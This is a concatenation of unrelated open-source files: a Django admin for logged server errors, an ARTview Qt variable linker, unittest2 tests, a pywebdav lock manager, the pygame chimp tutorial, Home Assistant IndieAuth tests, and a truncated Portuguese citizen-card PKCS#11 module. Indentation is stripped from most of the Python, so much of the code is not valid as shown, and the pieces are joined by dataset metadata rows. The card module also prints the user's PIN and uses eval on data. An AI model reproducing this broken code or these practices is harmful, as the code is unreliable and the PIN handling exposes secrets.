queryset = get_queryset
def get_changelist(self, request, **kwargs):
return FasterChangeList
def error_date_format(self, instance):
return instance.timestamp.strftime('%Y-%b-%d %H:%M')
error_date_format.admin_order_field = 'timestamp'
error_date_format.short_description = 'timestamp'
get_request_path = Truncate('request_path', 40)
def path_link(self, instance):
request_path = self.get_request_path(instance)
if 'GET' != instance.request_method:
if instance.request_method:
return u'%s (%s)' % (request_path, instance.request_method)
else:
return request_path
url = u'http://%s%s?%s' % (instance.hostname, instance.request_path, instance.query_string)
return u'<a href="{0}" title="{0}">{1}</a>'.format(url, request_path)
path_link.admin_order_field = 'request_path'
path_link.allow_tags = True
path_link.short_description = 'path'
def user_link(self, instance):
if not instance.user:
return u'(None)'
user = instance.user
url = reverse('admin:auth_user_change', args=(user.id,))
templ = u'<a href="{url}" title="{name}">{username}</a>'
return templ.format(url=url, username=user.username, name=get_name(user))
user_link.admin_order_field = 'user'
user_link.allow_tags = True
user_link.short_description = 'user'
def get_email_list(self, request, queryset):
emails = set()
for se in queryset.select_related('user'):
user = se.user
if user and user.email:
name = get_name(user)
emails.add('"%s" <%s>' % (name, user.email))
        return HttpResponse(',\n'.join(emails), content_type='text/plain')
get_email_list.short_description = 'Get user email addresses for selected errors'
def technicalresponse_link(self, instance):
tr_url = reverse('admin:shoogie_technicalresponse', kwargs={'pk':instance.pk})
return '<a href="%s"><b>debug</b></a>' % tr_url
technicalresponse_link.allow_tags = True
technicalresponse_link.short_description = 'Debug'
def resolve_servererror(self, request, queryset):
update_count = queryset.update(resolved=True)
plural = 's' if update_count != 1 else ''
self.message_user(request, "Marked %d error%s as resolved" % (update_count, plural))
resolve_servererror.short_description = "Mark selected errors as resolved"
def unresolve_servererror(self, request, queryset):
update_count = queryset.update(resolved=False)
plural = 's' if update_count != 1 else ''
self.message_user(request, "Marked %d error%s as not resolved" % (update_count, plural))
unresolve_servererror.short_description = "Mark selected errors as NOT resolved"
def get_urls(self):
myview = views.TechnicalResponseView.as_view()
myurls = patterns('',
url(r'(?P<pk>\d+)/technicalresponse/$',
self.admin_site.admin_view(myview, cacheable=True),
name='shoogie_technicalresponse',
),
)
return myurls + super(ServerErrorAdmin, self).get_urls()
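# The get_urls() override above serves the debug page used by
# technicalresponse_link; with the default admin site it resolves to
# /admin/shoogie/servererror/<pk>/technicalresponse/.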
admin.site.register(models.ServerError, ServerErrorAdmin)
| mit | -779,838,395,596,206,200 | 37.691824 | 121 | 0.603544 | false |
jjhelmus/artview | artview/components/component_control.py | 1 | 7105 | """
component_control.py
Class instance for control variables shared between components.
"""
# Load the needed packages
from functools import partial
from ..core import Variable, Component, QtGui, QtCore, common, componentsList
class LinkPlugins(Component):
'''
Class instance for control variables shared between components.
The user may select two components from a list. A radio menu is
added for every common sharable variable. Each variable may be unlinked
    from its counterpart in the other component.
    This is a powerful Component; multiple instances may conflict.
'''
@classmethod
def guiStart(self, parent=None):
kwargs, independent = \
common._SimplePluginStart("LinkPlugins").startDisplay()
kwargs['parent'] = parent
return self(**kwargs), independent
def __init__(self, components=None, name="LinkPlugins", parent=None):
'''Initialize the class to create the interface.
Parameters
----------
[Optional]
components : list of :py:class:`~artview.core.core.Component` instance
Components to control. If None will use the global list present in
artview.core.core.componentsList
name : string
            Window name.
parent : PyQt instance
Parent instance to associate to this class.
If None, then Qt owns, otherwise associated with parent PyQt
instance.
'''
super(LinkPlugins, self).__init__(name=name, parent=parent)
self.central_widget = QtGui.QWidget()
self.setCentralWidget(self.central_widget)
self.layout = QtGui.QGridLayout(self.central_widget)
if components is None:
self.components = componentsList
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentAppended"),
self._updateComponentList)
QtCore.QObject.connect(
self.components, QtCore.SIGNAL("ComponentRemoved"),
self._updateComponentList)
else:
self.components = components
self.comp0 = None
self.comp1 = None
self.setupUi()
self.show()
def _setVariables(self):
'''Determine common variables to both components.'''
self.variables = []
for var in self.comp0.sharedVariables.keys():
if var in self.comp1.sharedVariables.keys():
self.variables.append(var)
########################
# Button methods #
########################
def setupUi(self):
'''Build main layout.'''
if len(self.components) == 0:
return
if self.comp0 not in self.components:
self.comp0 = self.components[0]
if self.comp1 not in self.components:
self.comp1 = self.components[0]
# Select Components buttons
self.combo0 = QtGui.QComboBox()
self.combo0.activated[int].connect(self._comp0Action)
self.combo1 = QtGui.QComboBox()
self.combo1.activated[int].connect(self._comp1Action)
self.layout.addWidget(self.combo0, 0, 0)
self.layout.addWidget(self.combo1, 1, 0)
# Fill buttons
for component in self.components:
self.combo0.addItem(component.name)
self.combo1.addItem(component.name)
self.combo0.setCurrentIndex(self.components.index(self.comp0))
self.combo1.setCurrentIndex(self.components.index(self.comp1))
self._setVariables()
self._setRadioButtons()
def _setRadioButtons(self):
'''Add radio buttons for control over the variables.'''
# Radio Buttons
self.radioLayout = QtGui.QGridLayout()
self.layout.addLayout(self.radioLayout, 2, 0)
self.radioLayout.addWidget(QtGui.QLabel("Link"), 0, 1)
self.radioLayout.addWidget(QtGui.QLabel("Unlink"), 0, 2)
self.radioBoxes = []
for idx, var in enumerate(self.variables):
self._addRadioButton(var, idx)
def _addRadioButton(self, var, idx):
'''Add radio button for variable in the given index.'''
radioBox = QtGui.QButtonGroup()
        # keep a reference so the button group is not garbage collected
        self.radioBoxes.append(radioBox)
link = QtGui.QRadioButton()
unlink = QtGui.QRadioButton()
QtCore.QObject.connect(link, QtCore.SIGNAL("clicked()"),
partial(self.connectVar, var))
QtCore.QObject.connect(unlink, QtCore.SIGNAL("clicked()"),
partial(self.disconnectVar, var))
radioBox.addButton(link)
radioBox.addButton(unlink)
if getattr(self.comp0, var) is getattr(self.comp1, var):
link.setChecked(True)
else:
unlink.setChecked(True)
if self.comp0 is self.comp1:
unlink.setDisabled(True)
self.radioLayout.addWidget(QtGui.QLabel(var[1::]), idx+1, 0)
self.radioLayout.addWidget(link, idx+1, 1)
self.radioLayout.addWidget(unlink, idx+1, 2)
def _comp0Action(self, idx):
'''Update Component 0.'''
self.comp0 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def _comp1Action(self, idx):
'''Update Component 1.'''
self.comp1 = self.components[idx]
self._setVariables()
self._clearLayout(self.radioLayout)
self.layout.removeItem(self.radioLayout)
self._setRadioButtons()
def connectVar(self, var):
'''Assign variable in component 0 to component 1.'''
        # Disconnect the old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = comp0.var
setattr(self.comp1, var, getattr(self.comp0, var))
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("connect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def disconnectVar(self, var):
        '''Make the variable in component 1 independent of component 0.'''
        # Disconnect the old Variable
self.comp1.disconnectSharedVariable(var)
# comp1.var = Variable()
setattr(self.comp1, var, Variable())
# Connect new Variable
self.comp1.connectSharedVariable(var)
# emit signal
getattr(self.comp1, var).update()
print("disconnect var %s of %s from %s" % (
var, self.comp1.name, self.comp0.name))
def _clearLayout(self, layout):
'''Recursively remove items from layout.'''
while layout.count():
item = layout.takeAt(0)
widget = item.widget()
if widget is not None:
widget.deleteLater()
            elif item.layout() is not None:
                self._clearLayout(item.layout())
def _updateComponentList(self, item):
'''Rebuild main layout.'''
self._clearLayout(self.layout)
self.setupUi()
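# Minimal usage sketch (assumes a running Qt application; the shared-variable
# name 'Vradar' is illustrative only):
#
#     control = LinkPlugins()           # tracks the global componentsList
#     control.connectVar('Vradar')      # comp1 now follows comp0's Vradar
#     control.disconnectVar('Vradar')   # comp1 gets an independent Variable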
| bsd-3-clause | -6,517,890,652,482,973,000 | 34.348259 | 78 | 0.611119 | false |
apple/llvm-project | lldb/third_party/Python/module/unittest2/unittest2/test/test_new_tests.py | 15 | 1677 | from cStringIO import StringIO
import unittest
import unittest2
from unittest2.test.support import resultFactory
class TestUnittest(unittest2.TestCase):
def assertIsSubclass(self, actual, klass):
self.assertTrue(issubclass(actual, klass), "Not a subclass.")
def testInheritance(self):
self.assertIsSubclass(unittest2.TestCase, unittest.TestCase)
self.assertIsSubclass(unittest2.TestResult, unittest.TestResult)
self.assertIsSubclass(unittest2.TestSuite, unittest.TestSuite)
self.assertIsSubclass(
unittest2.TextTestRunner,
unittest.TextTestRunner)
self.assertIsSubclass(unittest2.TestLoader, unittest.TestLoader)
self.assertIsSubclass(unittest2.TextTestResult, unittest.TestResult)
def test_new_runner_old_case(self):
runner = unittest2.TextTestRunner(resultclass=resultFactory,
stream=StringIO())
class Test(unittest.TestCase):
def testOne(self):
pass
suite = unittest2.TestSuite((Test('testOne'),))
result = runner.run(suite)
self.assertEqual(result.testsRun, 1)
self.assertEqual(len(result.errors), 0)
def test_old_runner_new_case(self):
runner = unittest.TextTestRunner(stream=StringIO())
class Test(unittest2.TestCase):
def testOne(self):
self.assertDictEqual({}, {})
suite = unittest.TestSuite((Test('testOne'),))
result = runner.run(suite)
self.assertEqual(result.testsRun, 1)
self.assertEqual(len(result.errors), 0)
if __name__ == '__main__':
unittest2.main()
| apache-2.0 | -8,616,042,802,471,574,000 | 31.25 | 76 | 0.65653 | false |
cern-it-sdc-id/davix | test/pywebdav/lib/locks.py | 4 | 8255 | import os
import sys
import time
import socket
import string
import posixpath
import base64
import urlparse
import urllib
import random
import logging
log = logging.getLogger(__name__)
import xml.dom
from xml.dom import minidom
from utils import rfc1123_date, IfParser, tokenFinder
from string import atoi, split
from errors import *
tokens_to_lock = {}
uris_to_token = {}
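# Both maps are plain module-level dicts: locks live only in process memory
# and do not survive a server restart.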
class LockManager:
""" Implements the locking backend and serves as MixIn for DAVRequestHandler """
def _init_locks(self):
return tokens_to_lock, uris_to_token
def _l_isLocked(self, uri):
tokens, uris = self._init_locks()
return uris.has_key(uri)
def _l_hasLock(self, token):
tokens, uris = self._init_locks()
return tokens.has_key(token)
def _l_getLockForUri(self, uri):
tokens, uris = self._init_locks()
return uris.get(uri, None)
def _l_getLock(self, token):
tokens, uris = self._init_locks()
return tokens.get(token, None)
def _l_delLock(self, token):
tokens, uris = self._init_locks()
if tokens.has_key(token):
del uris[tokens[token].uri]
del tokens[token]
def _l_setLock(self, lock):
tokens, uris = self._init_locks()
tokens[lock.token] = lock
uris[lock.uri] = lock
def _lock_unlock_parse(self, body):
doc = minidom.parseString(body)
data = {}
info = doc.getElementsByTagNameNS('DAV:', 'lockinfo')[0]
data['lockscope'] = info.getElementsByTagNameNS('DAV:', 'lockscope')[0]\
.firstChild.localName
data['locktype'] = info.getElementsByTagNameNS('DAV:', 'locktype')[0]\
.firstChild.localName
data['lockowner'] = info.getElementsByTagNameNS('DAV:', 'owner')
return data
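    # A minimal request body accepted by _lock_unlock_parse(), shown for
    # illustration (see RFC 4918 for the full grammar):
    #
    #   <?xml version="1.0" encoding="utf-8" ?>
    #   <D:lockinfo xmlns:D="DAV:">
    #     <D:lockscope><D:exclusive/></D:lockscope>
    #     <D:locktype><D:write/></D:locktype>
    #     <D:owner><D:href>mailto:user@example.org</D:href></D:owner>
    #   </D:lockinfo>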
def _lock_unlock_create(self, uri, creator, depth, data):
lock = LockItem(uri, creator, **data)
iscollection = uri[-1] == '/' # very dumb collection check
result = ''
if depth == 'infinity' and iscollection:
# locking of children/collections not yet supported
pass
if not self._l_isLocked(uri):
self._l_setLock(lock)
# because we do not handle children we leave result empty
return lock.token, result
def do_UNLOCK(self):
""" Unlocks given resource """
dc = self.IFACE_CLASS
if self._config.DAV.getboolean('verbose') is True:
log.info('UNLOCKing resource %s' % self.headers)
uri = urlparse.urljoin(self.get_baseuri(dc), self.path)
uri = urllib.unquote(uri)
# check lock token - must contain a dash
if not self.headers.get('Lock-Token', '').find('-')>0:
return self.send_status(400)
token = tokenFinder(self.headers.get('Lock-Token'))
if self._l_isLocked(uri):
self._l_delLock(token)
self.send_body(None, '204', 'Ok', 'Ok')
def do_LOCK(self):
""" Locking is implemented via in-memory caches. No data is written to disk. """
dc = self.IFACE_CLASS
log.info('LOCKing resource %s' % self.headers)
body = None
if self.headers.has_key('Content-Length'):
l = self.headers['Content-Length']
body = self.rfile.read(atoi(l))
depth = self.headers.get('Depth', 'infinity')
uri = urlparse.urljoin(self.get_baseuri(dc), self.path)
uri = urllib.unquote(uri)
log.info('do_LOCK: uri = %s' % uri)
ifheader = self.headers.get('If')
alreadylocked = self._l_isLocked(uri)
log.info('do_LOCK: alreadylocked = %s' % alreadylocked)
if body and alreadylocked:
# Full LOCK request but resource already locked
self.responses[423] = ('Locked', 'Already locked')
return self.send_status(423)
elif body and not ifheader:
# LOCK with XML information
data = self._lock_unlock_parse(body)
token, result = self._lock_unlock_create(uri, 'unknown', depth, data)
if result:
self.send_body(result, '207', 'Error', 'Error',
'text/xml; charset="utf-8"')
else:
lock = self._l_getLock(token)
self.send_body(lock.asXML(), '200', 'OK', 'OK',
'text/xml; charset="utf-8"',
{'Lock-Token' : '<opaquelocktoken:%s>' % token})
else:
# refresh request - refresh lock timeout
taglist = IfParser(ifheader)
found = 0
for tag in taglist:
for listitem in tag.list:
token = tokenFinder(listitem)
if token and self._l_hasLock(token):
lock = self._l_getLock(token)
timeout = self.headers.get('Timeout', 'Infinite')
lock.setTimeout(timeout) # automatically refreshes
found = 1
self.send_body(lock.asXML(),
'200', 'OK', 'OK', 'text/xml; encoding="utf-8"')
break
if found:
break
# we didn't find any of the tokens mentioned - means
# that table was cleared or another error
if not found:
self.send_status(412) # precondition failed
class LockItem:
""" Lock with support for exclusive write locks. Some code taken from
webdav.LockItem from the Zope project. """
def __init__(self, uri, creator, lockowner, depth=0, timeout='Infinite',
locktype='write', lockscope='exclusive', token=None, **kw):
self.uri = uri
self.creator = creator
self.owner = lockowner
self.depth = depth
self.timeout = timeout
self.locktype = locktype
self.lockscope = lockscope
self.token = token and token or self.generateToken()
self.modified = time.time()
def getModifiedTime(self):
return self.modified
def refresh(self):
self.modified = time.time()
    def isValid(self):
        # 'Infinite' locks never expire; other timeouts arrive as
        # 'Second-NNN' strings via the Timeout header.
        timeout = self.timeout
        if isinstance(timeout, basestring):
            if 'Infinite' in timeout:
                return True
            timeout = atoi(timeout.split('-')[-1])
        return (self.modified + timeout) > time.time()
def generateToken(self):
_randGen = random.Random(time.time())
return '%s-%s-00105A989226:%.03f' % \
(_randGen.random(),_randGen.random(),time.time())
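    # Tokens are wrapped as 'opaquelocktoken:<token>' both in the Lock-Token
    # response header and in the lockdiscovery XML (see do_LOCK and asXML).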
def getTimeoutString(self):
t = str(self.timeout)
if t[-1] == 'L': t = t[:-1]
return 'Second-%s' % t
def setTimeout(self, timeout):
self.timeout = timeout
self.modified = time.time()
def asXML(self, namespace='d', discover=False):
owner_str = ''
if isinstance(self.owner, str):
owner_str = self.owner
elif isinstance(self.owner, xml.dom.minicompat.NodeList):
owner_str = "".join([node.toxml() for node in self.owner[0].childNodes])
token = self.token
base = ('<%(ns)s:activelock>\n'
' <%(ns)s:locktype><%(ns)s:%(locktype)s/></%(ns)s:locktype>\n'
' <%(ns)s:lockscope><%(ns)s:%(lockscope)s/></%(ns)s:lockscope>\n'
' <%(ns)s:depth>%(depth)s</%(ns)s:depth>\n'
' <%(ns)s:owner>%(owner)s</%(ns)s:owner>\n'
' <%(ns)s:timeout>%(timeout)s</%(ns)s:timeout>\n'
' <%(ns)s:locktoken>\n'
' <%(ns)s:href>opaquelocktoken:%(locktoken)s</%(ns)s:href>\n'
' </%(ns)s:locktoken>\n'
' </%(ns)s:activelock>\n'
) % {
'ns': namespace,
'locktype': self.locktype,
'lockscope': self.lockscope,
'depth': self.depth,
'owner': owner_str,
'timeout': self.getTimeoutString(),
'locktoken': token,
}
if discover is True:
return base
s = """<?xml version="1.0" encoding="utf-8" ?>
<d:prop xmlns:d="DAV:">
<d:lockdiscovery>
%s
</d:lockdiscovery>
</d:prop>""" % base
return s
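# Usage sketch (not part of the original module): constructing a lock by
# hand and rendering it. The one-hour timeout is an arbitrary example value;
# the token is generated automatically when none is supplied.
if __name__ == '__main__':
    item = LockItem('http://localhost/file.txt', 'creator', 'owner',
                    depth=0, timeout=3600)
    print item.getTimeoutString()    # -> 'Second-3600'
    print item.asXML(discover=True)  # bare <d:activelock> fragment
    print item.asXML()               # full <d:prop> lock discovery document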
| lgpl-2.1 | -6,220,525,025,926,709,000 | 31.372549 | 89 | 0.544155 | false |
gmittal/aar-nlp-research-2016 | src/pygame-pygame-6625feb3fc7f/examples/chimp.py | 32 | 5876 | #!/usr/bin/env python
"""
This simple example is used for the line-by-line tutorial
that comes with pygame. It is based on a 'popular' web banner.
Note there are comments here, but for the full explanation,
follow along in the tutorial.
"""
#Import Modules
import os, pygame
from pygame.locals import *
from pygame.compat import geterror
if not pygame.font: print ('Warning, fonts disabled')
if not pygame.mixer: print ('Warning, sound disabled')
main_dir = os.path.split(os.path.abspath(__file__))[0]
data_dir = os.path.join(main_dir, 'data')
#functions to create our resources
def load_image(name, colorkey=None):
fullname = os.path.join(data_dir, name)
try:
image = pygame.image.load(fullname)
except pygame.error:
print ('Cannot load image:', fullname)
raise SystemExit(str(geterror()))
image = image.convert()
if colorkey is not None:
        if colorkey == -1:
colorkey = image.get_at((0,0))
image.set_colorkey(colorkey, RLEACCEL)
return image, image.get_rect()
def load_sound(name):
class NoneSound:
def play(self): pass
if not pygame.mixer or not pygame.mixer.get_init():
return NoneSound()
fullname = os.path.join(data_dir, name)
try:
sound = pygame.mixer.Sound(fullname)
except pygame.error:
print ('Cannot load sound: %s' % fullname)
raise SystemExit(str(geterror()))
return sound
#classes for our game objects
class Fist(pygame.sprite.Sprite):
"""moves a clenched fist on the screen, following the mouse"""
def __init__(self):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.image, self.rect = load_image('fist.bmp', -1)
self.punching = 0
def update(self):
"move the fist based on the mouse position"
pos = pygame.mouse.get_pos()
self.rect.midtop = pos
if self.punching:
self.rect.move_ip(5, 10)
def punch(self, target):
"returns true if the fist collides with the target"
if not self.punching:
self.punching = 1
hitbox = self.rect.inflate(-5, -5)
return hitbox.colliderect(target.rect)
def unpunch(self):
"called to pull the fist back"
self.punching = 0
class Chimp(pygame.sprite.Sprite):
"""moves a monkey critter across the screen. it can spin the
monkey when it is punched."""
def __init__(self):
        pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.image, self.rect = load_image('chimp.bmp', -1)
screen = pygame.display.get_surface()
self.area = screen.get_rect()
self.rect.topleft = 10, 10
self.move = 9
self.dizzy = 0
def update(self):
"walk or spin, depending on the monkeys state"
if self.dizzy:
self._spin()
else:
self._walk()
def _walk(self):
"move the monkey across the screen, and turn at the ends"
newpos = self.rect.move((self.move, 0))
if self.rect.left < self.area.left or \
self.rect.right > self.area.right:
self.move = -self.move
newpos = self.rect.move((self.move, 0))
self.image = pygame.transform.flip(self.image, 1, 0)
self.rect = newpos
def _spin(self):
"spin the monkey image"
center = self.rect.center
self.dizzy = self.dizzy + 12
if self.dizzy >= 360:
self.dizzy = 0
self.image = self.original
else:
rotate = pygame.transform.rotate
self.image = rotate(self.original, self.dizzy)
self.rect = self.image.get_rect(center=center)
def punched(self):
"this will cause the monkey to start spinning"
if not self.dizzy:
self.dizzy = 1
self.original = self.image
def main():
"""this function is called when the program starts.
it initializes everything it needs, then runs in
a loop until the function returns."""
#Initialize Everything
pygame.init()
screen = pygame.display.set_mode((468, 60))
pygame.display.set_caption('Monkey Fever')
pygame.mouse.set_visible(0)
    #Create The Background
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((250, 250, 250))
#Put Text On The Background, Centered
if pygame.font:
font = pygame.font.Font(None, 36)
text = font.render("Pummel The Chimp, And Win $$$", 1, (10, 10, 10))
textpos = text.get_rect(centerx=background.get_width()/2)
background.blit(text, textpos)
#Display The Background
screen.blit(background, (0, 0))
pygame.display.flip()
#Prepare Game Objects
clock = pygame.time.Clock()
whiff_sound = load_sound('whiff.wav')
punch_sound = load_sound('punch.wav')
chimp = Chimp()
fist = Fist()
allsprites = pygame.sprite.RenderPlain((fist, chimp))
#Main Loop
going = True
while going:
clock.tick(60)
#Handle Input Events
for event in pygame.event.get():
if event.type == QUIT:
going = False
elif event.type == KEYDOWN and event.key == K_ESCAPE:
going = False
elif event.type == MOUSEBUTTONDOWN:
if fist.punch(chimp):
punch_sound.play() #punch
chimp.punched()
else:
whiff_sound.play() #miss
elif event.type == MOUSEBUTTONUP:
fist.unpunch()
allsprites.update()
#Draw Everything
screen.blit(background, (0, 0))
allsprites.draw(screen)
pygame.display.flip()
pygame.quit()
#Game Over
#this calls the 'main' function when this script is executed
if __name__ == '__main__':
main()
| mit | -7,890,414,618,805,825,000 | 29.28866 | 76 | 0.604152 | false |
kennedyshead/home-assistant | tests/components/auth/test_indieauth.py | 8 | 6005 | """Tests for the client validator."""
import asyncio
from unittest.mock import patch
import pytest
from homeassistant.components.auth import indieauth
from tests.test_util.aiohttp import AiohttpClientMocker
@pytest.fixture
def mock_session():
"""Mock aiohttp.ClientSession."""
mocker = AiohttpClientMocker()
with patch(
"aiohttp.ClientSession",
side_effect=lambda *args, **kwargs: mocker.create_session(
asyncio.get_event_loop()
),
):
yield mocker
def test_client_id_scheme():
"""Test we enforce valid scheme."""
assert indieauth._parse_client_id("http://ex.com/")
assert indieauth._parse_client_id("https://ex.com/")
with pytest.raises(ValueError):
indieauth._parse_client_id("ftp://ex.com")
def test_client_id_path():
"""Test we enforce valid path."""
assert indieauth._parse_client_id("http://ex.com").path == "/"
assert indieauth._parse_client_id("http://ex.com/hello").path == "/hello"
assert (
indieauth._parse_client_id("http://ex.com/hello/.world").path == "/hello/.world"
)
assert (
indieauth._parse_client_id("http://ex.com/hello./.world").path
== "/hello./.world"
)
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/.")
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/hello/./yo")
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/hello/../yo")
def test_client_id_fragment():
"""Test we enforce valid fragment."""
with pytest.raises(ValueError):
indieauth._parse_client_id("http://ex.com/#yoo")
def test_client_id_user_pass():
"""Test we enforce valid username/password."""
with pytest.raises(ValueError):
indieauth._parse_client_id("http://[email protected]/")
with pytest.raises(ValueError):
indieauth._parse_client_id("http://user:[email protected]/")
def test_client_id_hostname():
"""Test we enforce valid hostname."""
assert indieauth._parse_client_id("http://www.home-assistant.io/")
assert indieauth._parse_client_id("http://[::1]")
assert indieauth._parse_client_id("http://127.0.0.1")
assert indieauth._parse_client_id("http://10.0.0.0")
assert indieauth._parse_client_id("http://10.255.255.255")
assert indieauth._parse_client_id("http://172.16.0.0")
assert indieauth._parse_client_id("http://172.31.255.255")
assert indieauth._parse_client_id("http://192.168.0.0")
assert indieauth._parse_client_id("http://192.168.255.255")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://255.255.255.255/")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://11.0.0.0/")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://172.32.0.0/")
with pytest.raises(ValueError):
assert indieauth._parse_client_id("http://192.167.0.0/")
def test_parse_url_lowercase_host():
"""Test we update empty paths."""
assert indieauth._parse_url("http://ex.com/hello").path == "/hello"
assert indieauth._parse_url("http://EX.COM/hello").hostname == "ex.com"
parts = indieauth._parse_url("http://EX.COM:123/HELLO")
assert parts.netloc == "ex.com:123"
assert parts.path == "/HELLO"
def test_parse_url_path():
"""Test we update empty paths."""
assert indieauth._parse_url("http://ex.com").path == "/"
async def test_verify_redirect_uri():
"""Test that we verify redirect uri correctly."""
assert await indieauth.verify_redirect_uri(
None, "http://ex.com", "http://ex.com/callback"
)
with patch.object(indieauth, "fetch_redirect_uris", return_value=[]):
# Different domain
assert not await indieauth.verify_redirect_uri(
None, "http://ex.com", "http://different.com/callback"
)
# Different scheme
assert not await indieauth.verify_redirect_uri(
None, "http://ex.com", "https://ex.com/callback"
)
# Different subdomain
assert not await indieauth.verify_redirect_uri(
None, "https://sub1.ex.com", "https://sub2.ex.com/callback"
)
async def test_find_link_tag(hass, mock_session):
"""Test finding link tag."""
mock_session.get(
"http://127.0.0.1:8000",
text="""
<!doctype html>
<html>
<head>
<link rel="redirect_uri" href="hass://oauth2_redirect">
<link rel="other_value" href="hass://oauth2_redirect">
<link rel="redirect_uri" href="/beer">
</head>
...
</html>
""",
)
redirect_uris = await indieauth.fetch_redirect_uris(hass, "http://127.0.0.1:8000")
assert redirect_uris == ["hass://oauth2_redirect", "http://127.0.0.1:8000/beer"]
async def test_find_link_tag_max_size(hass, mock_session):
"""Test finding link tag."""
text = "".join(
[
'<link rel="redirect_uri" href="/wine">',
("0" * 1024 * 10),
'<link rel="redirect_uri" href="/beer">',
]
)
mock_session.get("http://127.0.0.1:8000", text=text)
redirect_uris = await indieauth.fetch_redirect_uris(hass, "http://127.0.0.1:8000")
assert redirect_uris == ["http://127.0.0.1:8000/wine"]
@pytest.mark.parametrize(
"client_id",
["https://home-assistant.io/android", "https://home-assistant.io/iOS"],
)
async def test_verify_redirect_uri_android_ios(client_id):
"""Test that we verify redirect uri correctly for Android/iOS."""
with patch.object(indieauth, "fetch_redirect_uris", return_value=[]):
assert await indieauth.verify_redirect_uri(
None, client_id, "homeassistant://auth-callback"
)
assert not await indieauth.verify_redirect_uri(
None, client_id, "homeassistant://something-else"
)
assert not await indieauth.verify_redirect_uri(
None, "https://incorrect.com", "homeassistant://auth-callback"
)
| apache-2.0 | -2,260,595,293,303,195,400 | 31.459459 | 88 | 0.627977 | false |
joelpinheiro/safebox-smartcard-auth | ccModule.py | 1 | 10386 | # Portuguese Citizen Card Module for SafeBox
# author: Miguel Vicente
#
# reference:
# www.bit4id.org/trac/pykcs11
import PyKCS11
import getopt
import sys
import platform
import pytz
from datetime import datetime
from pytz import timezone
from M2Crypto import X509
import OpenSSL
import re
import requests
class ccHandler(object):
def __init__(self):
self.pkcs11 = PyKCS11.PyKCS11Lib()
self.pkcs11.load("libpteidpkcs11.so")
self.slots = self.pkcs11.getSlotList()
self.session = None
self.attrDict = None
self.key = None
self.signature = None
self.e = None
self.m = None
self.ex = None
self.mx = None
def getSlotInfo(self,slot):
print "Slot n.:",slot
print self.pkcs11.getSlotInfo(slot)
def getTokenInfo(self,slot):
print self.pkcs11.getTokenInfo(slot)
def getMechanismInfo(self,slot):
print "Mechanism list:"
m = self.pkcs11.getMechanismList(slot)
for x in m:
i = self.pkcs11.getMechanismInfo(slot,x)
if not i.flags & PyKCS11.CFK_DIGEST:
                if i.ulMinKeySize != PyKCS11.CK_UNAVAILABLE_INFORMATION:
                    print "ulMinKeySize: " + str(i.ulMinKeySize)
                if i.ulMaxKeySize != PyKCS11.CK_UNAVAILABLE_INFORMATION:
                    print "ulMaxKeySize: " + str(i.ulMaxKeySize)
def getInfo(self):
print self.pkcs11.getInfo()
def getSessionInfo(self,slot,pin=""):
session = self.pkcs11.openSession(slot)
if pin != "":
if pin == None:
print "(using pinpad)"
else:
print "(using pin: %s)" % pin
session.login(pin)
else:
print
if pin:
session.logout()
def openSession(self):
for s in self.slots:
try:
self.session = self.pkcs11.openSession(s)
print "Opened session 0x%08X" % self.session.session.value()
                pin = raw_input("Your smartcard pin is required: ")
try:
self.session.login(pin=str(pin))
self.loadDict() #ler objecto rsa
break
except:
print "login failed, exception:", str(sys.exc_info()[1])
except PyKCS11.PyKCS11Error, e:
print "Error:", e
def loadDict(self):
objects = self.session.findObjects()
all_attributes = PyKCS11.CKA.keys()
# remove the CKR_ATTRIBUTE_SENSITIVE attributes since we can't get
# their values and will get an exception instead
all_attributes.remove(PyKCS11.CKA_PRIVATE_EXPONENT)
all_attributes.remove(PyKCS11.CKA_PRIME_1)
all_attributes.remove(PyKCS11.CKA_PRIME_2)
all_attributes.remove(PyKCS11.CKA_EXPONENT_1)
all_attributes.remove(PyKCS11.CKA_EXPONENT_2)
all_attributes.remove(PyKCS11.CKA_COEFFICIENT)
# only use the integer values and not the strings like 'CKM_RSA_PKCS'
all_attributes = [e for e in all_attributes if isinstance(e, int)]
for o in objects:
attributes = self.session.getAttributeValue(o, all_attributes)
attrDict = dict(zip(all_attributes, attributes))
if attrDict[PyKCS11.CKA_CLASS] == PyKCS11.CKO_PRIVATE_KEY \
and attrDict[PyKCS11.CKA_KEY_TYPE] == PyKCS11.CKK_RSA:
self.key = o;
self.attrDict = attrDict;
break
def sign(self):
#assinar challenge do servidor com a chave privada
try:
toSign = "12345678901234567890" #TODO Challenge do servidor
self.signature = self.session.sign(self.key,toSign)
print "Signature:"
print self.signature
print dump(''.join(map(chr, self.signature)), 16)
except:
print "Sign failed, exception:", str(sys.exc_info()[1])
def verify(self):
self.m = self.attrDict[PyKCS11.CKA_MODULUS]
self.e = self.attrDict[PyKCS11.CKA_PUBLIC_EXPONENT]
s = ''.join(chr(c) for c in self.signature).encode('hex')
self.mx = eval('0x%s' % ''.join(chr(c) for c in self.m).encode('hex'))
        self.ex = eval('0x%s' % ''.join(chr(c) for c in self.e).encode('hex'))
print "self.mx" + str(self.mx)
print "self.ex" + str(self.ex)
sx = eval('0x%s' % s)
decrypted = pow(sx,self.ex,self.mx)
d = hexx(decrypted).decode('hex')
print "Decrypted:"
print dump(d, 16)
def certificates(self):
"""
Get certificates
"""
objects = self.session.findObjects()
try:
certificates = []
for obj in objects:
d = obj.to_dict()
if d['CKA_CLASS'] == 'CKO_CERTIFICATE':
der = self._os2str(d['CKA_VALUE'])
cert = X509.load_cert_string(der, X509.FORMAT_DER)
certificates.append(cert)
return certificates
except:
return 'Error: Getting User Certificate'
def _os2str(self, os):
"""
Convert octet string to python string
"""
return ''.join(chr(c) for c in os)
def bi(self):
BIprefix = "serialNumber=BI"
certificates = self.certificates()
